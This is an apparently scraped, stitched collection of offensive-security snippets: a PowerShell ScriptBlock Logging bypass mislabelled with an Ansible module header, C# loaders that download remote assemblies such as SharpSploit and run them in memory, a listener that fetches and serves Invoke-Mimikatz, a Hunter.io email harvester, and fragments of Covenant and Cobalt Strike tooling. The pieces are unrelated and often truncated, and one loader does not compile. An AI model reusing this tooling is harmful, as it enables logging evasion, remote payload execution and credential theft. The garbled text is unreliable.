#!powershell | |
# Copyright: (c) 2022 Jordan Borean (@jborean93) jborean93@gmail.com | |
# Copyright: (c) 2023, Ryan Cobb <ryancobb65@gmail.com> | |
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) | |
#AnsibleRequires -CsharpUtil Ansible.Basic | |
# win_domain_child module |
# ScriptBlock Logging Bypass | |
# @cobbr_io | |
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static') | |
If ($GroupPolicyField) { | |
$GroupPolicyCache = $GroupPolicyField.GetValue($null) | |
If ($GroupPolicyCache['ScriptB'+'lockLogging']) { | |
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0 | |
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0 | |
} |
/// <summary>
/// Reference sample of a remote, in-memory .NET assembly loader: it downloads raw
/// bytes from the URL given as the first command-line argument, loads them into
/// the current process as an assembly, and invokes one method from it.
/// </summary>
/// <remarks>
/// Review notes for defenders:
/// - The payload is never written to disk by this code, so on-disk file scanning
///   does not see it; coverage has to come from the runtime and the network.
/// - On .NET Framework 4.8 and later, assemblies loaded from a byte array are
///   submitted to AMSI, and the CLR ETW provider (Microsoft-Windows-DotNETRuntime)
///   emits assembly-load events that can be collected for this pattern.
/// - The URL is taken from args[0] unchecked and the downloaded bytes are not
///   verified (no signature or hash check), so whatever the server returns runs
///   with the privileges of this process.
/// </remarks>
public class Program
{
    public static void Main(string[] args)
    {
        // Outbound fetch: args[0] is used directly as the download URL.
        byte[] rawAssembly = new System.Net.WebClient().DownloadData(args[0]);

        // Byte-array load: the assembly exists only in this process's memory.
        System.Reflection.Assembly loaded = System.Reflection.Assembly.Load(rawAssembly);

        // Target selection is positional: the first type returned by GetTypes()
        // and the first method returned by GetMethods() on that type.
        System.Reflection.MethodInfo firstMethod = loaded.GetTypes()[0].GetMethods()[0];

        // Invoked with the boxed value 0 as the target object and no arguments.
        firstMethod.Invoke(0, null);
    }
}
function Measure-CharacterFrequency | |
{ | |
<# | |
.SYNOPSIS | |
Measures the letter / character frequency in a block of text, ignoring whitespace | |
and PowerShell comment blocks. | |
Author: Lee Holmes |
import requests | |
import sys | |
if len(sys.argv) is 3: | |
domain = sys.argv[1] | |
api_key = sys.argv[2] | |
if domain is not None: | |
url = "https://hunter.io/v2/domain-search?limit=10000&offset=0&domain="\ | |
+domain+"&api_key="+api_key+"&format=json" | |
hunterJsonData = requests.get(url) | |
for email in hunterJsonData.json()['data']['emails']: |
/// <summary>
/// Reference sample of a remote, in-memory .NET assembly loader with a fixed
/// target: it downloads an assembly from a hard-coded URL, loads it into the
/// current process, looks up one named type and method by reflection, and
/// invokes that method.
/// </summary>
/// <remarks>
/// Review notes for defenders:
/// - The downloaded bytes are loaded from memory, not from a file, so on-disk
///   scanning does not see them. On .NET Framework 4.8 and later, byte-array
///   assembly loads are submitted to AMSI, and the CLR ETW provider
///   (Microsoft-Windows-DotNETRuntime) emits assembly-load events.
/// - The type and method names are plain string literals here, so they are
///   available to static and memory string matching.
/// - The downloaded content is not verified (no signature or hash check).
/// </remarks>
public class Program
{
    public static void Main()
    {
        // Outbound fetch of the assembly bytes from a fixed URL.
        byte[] rawAssembly = new System.Net.WebClient().DownloadData("https://example.com/SharpSploit.dll");

        // Byte-array load: the assembly exists only in this process's memory.
        System.Reflection.Assembly loaded = System.Reflection.Assembly.Load(rawAssembly);

        // Reflection lookup by name; GetType/GetMethod return null when the name
        // is not found, which this code does not check.
        System.Reflection.MethodInfo shellExecute = loaded.GetType("SharpSploit.Execution.Shell").GetMethod("ShellExecute");

        // NOTE(review): `@(...)` is PowerShell array syntax, not C#; as written
        // this argument expression does not compile. It is reproduced unchanged.
        shellExecute.Invoke(0, @("whoami", "", "", ""));
    }
}
$mk = (new-object net.webclient).downloadstring("https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1") | |
$Hso = New-Object Net.HttpListener | |
$Hso.Prefixes.Add("http://+:8080/") | |
$Hso.Start() | |
While ($Hso.IsListening) { | |
$HC = $Hso.GetContext() | |
$HRes = $HC.Response | |
$HRes.Headers.Add("Content-Type","text/plain") | |
If (($HC.Request).RawUrl -eq '/home/news/a/21/article.html') { | |
$Buf = [Text.Encoding]::UTF8.GetBytes($mk) |
@using Covenant.Core | |
@using Covenant.Models.Grunts | |
@model GruntTasking | |
@{ | |
Layout = "_GruntTaskingLayout"; | |
ViewData["Title"] = "Grunts"; | |
} | |
<div class="d-flex justify-content-between flex-wrap flex-md-nowrap pb-2 mb-3"> | |
<h1 class="h2">GruntTasking: <span id="tasking-name" class="text-primary">@Html.DisplayFor(model => model.Name)</span></h1> | |
</div> |
$dotnetpath = "/usr/local/share/dotnet/dotnet"; | |
$sharpgenpath = "/Users/dtmsecurity/Tools/SharpGen/bin/Debug/netcoreapp2.1/SharpGen.dll"; | |
$temppath = "/tmp/"; | |
beacon_command_register("sharpgen", "Compile and execute C-Sharp","Synopsis: sharpgen [code]\n"); | |
alias sharpgen{ | |
$executionId = "sharpgen_" . int(rand() * 100000); | |
$temporaryCsharp = $temppath . $executionId . ".cs"; | |
$executableFilename = $temppath . $executionId . ".exe"; |
cobbr@mac:~/SharpGen > cp -r ~/GhostPack/SharpWMI/SharpWMI ./Source | |
cobbr@mac:~/SharpGen > cat example.txt | |
SharpWMI.Program.LocalWMIQuery("select * from win32_service"); | |
Console.WriteLine(Host.GetProcessList()); | |
cobbr@mac:~/SharpGen > dotnet bin/Release/netcoreapp2.1/SharpGen.dll -f example.exe --source-file example.txt | |
... | |
[*] Compiled assembly written to: /Users/cobbr/SharpGen/Output/example.exe |